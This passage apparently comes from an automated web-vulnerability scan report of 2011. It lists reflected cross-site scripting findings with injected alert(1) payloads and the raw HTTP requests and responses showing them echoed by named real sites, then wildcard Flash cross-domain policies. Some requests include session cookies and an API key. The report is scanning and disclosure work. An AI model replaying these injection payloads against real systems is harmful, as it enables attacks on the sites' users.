The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 55a0d%3balert(1)//87929036ab1 was submitted in the zimg parameter. This input was echoed as 55a0d;alert(1)//87929036ab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=5955a0d%3balert(1)//87929036ab1&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:23 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9840


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 5955a0d;alert(1)//87929036ab1 + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=&rndstr=" + lhnrand_no + "'>
...[SNIP]...

3.126. http://www.w3schools.com/js/tryit_view.asp [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /js/tryit_view.asp

Issue detail

The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 1bb34<script>alert(1)</script>4e27ce41b52 was submitted in the code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /js/tryit_view.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/tryit.asp?filename=tryjs_text
Content-Length: 289
Cache-Control: max-age=0
Origin: http://www.w3schools.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.10.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

submit=Edit+and+Click+Me+%3E%3E&code=%253Chtml%253E%250A%253Cbody%253E%250A%250A%253Cscript%2520type%253D%2522text%2Fjavascript%2522%253E%250Adocument.write%2528%2522Hello%2520World%2521%2522%2529%253B%250A%253C%2Fscript%253E%250A%250A%253C%2Fbody%253E%250A%253C%2Fhtml%253E%250A%250A1bb34<script>alert(1)</script>4e27ce41b52&bt=1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:30 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 148
Content-Type: text/html
Cache-control: private

<html>
<body>

<script type="text/javascript">
document.write("Hello World!");
</script>

</body>
</html>

1bb34<script>alert(1)</script>4e27ce41b52

3.127. http://www.w3schools.com/jsref/tryit_view.asp [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit_view.asp

Issue detail

The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 303c8<script>alert(1)</script>a71ebc654b was submitted in the code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /jsref/tryit_view.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_doc_open2
Content-Length: 439
Cache-Control: max-age=0
Origin: http://www.w3schools.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.11.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

submit=Edit+and+Click+Me+%3E%3E&code=%253Chtml%253E%250A%253Cbody%253E%250A%250A%253Cscript%2520type%253D%2522text%2Fjavascript%2522%253E%250Avar%2520w%253Dwindow.open%2528%2529%253B%250Aw.document.op
...[SNIP]...
rite%2528%2522%253Ch1%253EHello%2520World%2521%253C%2Fh1%253E%2522%2529%253B%250Aw.document.close%2528%2529%253B%250A%253C%2Fscript%253E%250A%250A%253C%2Fbody%253E%250A%253C%2Fhtml%253E%2520%250A%250A303c8<script>alert(1)</script>a71ebc654b&bt=1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:32:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Cache-control: private

<html>
<body>

<script type="text/javascript">
var w=window.open();
w.document.open();
w.document.write("<h1>Hello World!</h1>");
w.document.close();
</script>

</body>
</html>

303c8<script>alert(1)</script>a71ebc654b

3.128. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d2551<script>alert(1)</script>1979d1643d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: d2551<script>alert(1)</script>1979d1643d9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:17:57 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=5385daf0-5a45-4c91-b8da-57deda1620a8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: d2551<script>alert(1)</script>1979d1643d9

3.129. https://mpsnare.iesnare.com/snare.js [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mpsnare.iesnare.com
Path:   /snare.js

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78d"-alert(1)-"b6aa71aa6bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /snare.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)de78d"-alert(1)-"b6aa71aa6bb
Accept-Encoding: gzip, deflate
Cookie: token=XnRHGFdzDJ8Inb%2Fhay3wwALOAzXiYWksbDCgNf6jldU%3D
Host: mpsnare.iesnare.com
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:13 GMT
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: token=fdYa0tIi8TSNEW3rvx0RPGo677MT9Ucnr83oXeEM4Go%3D; domain=iesnare.com; path=/; expires=Wed, 01-Sep-2021 21:35:13 GMT; secure
p3p: CP="NON DSP COR CURa"
Keep-Alive: timeout=2, max=74
Connection: Keep-Alive
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 21:35:13 GMT
Content-Length: 29980

/* Copyright(c) 2009, iovation, inc. All rights reserved. Version: 3.0.0 */ window.io_last_error="";function isRipEnabled(){return window.io_enable_rip;}function contentUrl(){return __if_b(_i_f);}func
...[SNIP]...
{this.JENBL="1";this.UAGT=navigator.userAgent;if(!__if_j()){this.JSTOKEN="fdYa0tIi8TSNEW3rvx0RPGo677MT9Ucnr83oXeEM4Go=";this.UAGT="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)de78d"-alert(1)-"b6aa71aa6bb";this.HACCLNG="en-US";this.HACCCHR="";}this.JSVER="300";var _i_dr=new Date();this.TZON=String(_i_dr.getTimezoneOffset());this.JSTIME=_i_dr.__if_m();var _i_ce=new __if_i();this.JBRNM=_i_ce.browser;this
...[SNIP]...

3.130. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a1d"-alert(1)-"59b4541068d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=31a1d"-alert(1)-"59b4541068d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=755C60E8161379FBEEA117E61515830A; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=31a1d"-alert(1)-"59b4541068d",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240&campId=161441",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000
...[SNIP]...

3.131. http://apps.sapha.com/appshandler.php [sapha_2522_1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the sapha_2522_1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e89c4'%3balert(1)//76f56e1d866 was submitted in the sapha_2522_1 cookie. This input was echoed as e89c4';alert(1)//76f56e1d866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appshandler.php?ac=2522&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE; sapha_2522_1=1038376%7C214589%7C149788%7C2011-09-04+10%3A18%3A45e89c4'%3balert(1)//76f56e1d866

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 20427
Connection: close
Content-Type: application/x-javascript

var lastpageview_ID='1038376';var lastvisit_ID='214589';var lastvisitor_ID='149788';var lastvisit_datetime='2011-09-04 10:18:45e89c4';alert(1)//76f56e1d866';function loadDomUtils(){if(document.getElementsByClassName==undefined){document.getElementsByClassName=function(B,A){if(A==null){A="*"}var F=new RegExp("(?:^|\\s)"+B+"(?:$|\\s)");var G=document.getEl
...[SNIP]...

3.132. http://ecustomeropinions.com/survey/survey.php [server cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bbe"%20style%3dx%3aexpression(alert(1))%200e696d288b3 was submitted in the server cookie. This input was echoed as b2bbe\" style=x:expression(alert(1)) 0e696d288b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /survey/survey.php HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ecustomeropinions.com/survey/survey.php?sid=603736412&data1=5.5.0.115&data2=xss.cx
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=---------------------------7db5bf1d41c68
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ecustomeropinions.com
Content-Length: 2753
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: server=www18b2bbe"%20style%3dx%3aexpression(alert(1))%200e696d288b3; PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3

-----------------------------7db5bf1d41c68
Content-Disposition: form-data; name="survey_submitting"

1
-----------------------------7db5bf1d41c68
Content-Disposition: form-data; name="sid"

603
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:11:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Content-Length: 6521
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="debug_server_page_cookie" value="www18b2bbe\" style=x:expression(alert(1)) 0e696d288b3" />
...[SNIP]...

3.133. http://ecustomeropinions.com/survey/survey.php [server cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5d7"%20style%3dx%3aexpression(alert(1))%208dda330855a was submitted in the server cookie. This input was echoed as 6b5d7\" style=x:expression(alert(1)) 8dda330855a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /survey/survey.php?sid=603736412&pagenum=1&ecos_live_sessionkey=ecos_sesh_753333&doneskipping=1&vault=_ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com
Cookie: server=6b5d7"%20style%3dx%3aexpression(alert(1))%208dda330855a; PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www19; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Content-Length: 6318
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="debug_server_page_cookie" value="6b5d7\" style=x:expression(alert(1)) 8dda330855a" />
...[SNIP]...

3.134. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ba3"><script>alert(1)</script>aac61ce975a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?20ba3"><script>alert(1)</script>aac61ce975a=1 HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 04 Sep 2011 16:31:13 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 243
Location: http://h30046.www3.hp.com/?20ba3"><script>alert(1)</script>aac61ce975a=1

<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?20ba3"><script>alert(1)</script>aac61ce975a=1">http://h30046.www3.hp.com/?20ba3"><script>alert
...[SNIP]...

3.135. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa4b2<script>alert(1)</script>994bc586213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?aa4b2<script>alert(1)</script>994bc586213=1 HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 04 Sep 2011 16:31:14 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 239
Location: http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1

<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1">http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1</a>
...[SNIP]...

4. Flash cross-domain policy
There are 67 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://142.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 142.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 05 Sep 2011 02:30:52 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 05 Sep 2011 02:30:51 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.3. http://afe.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.4. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 23:16:58 GMT
Date: Sat, 03 Sep 2011 23:16:58 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 79533

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.5. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 16:18:51 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.6. http://apps.sapha.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

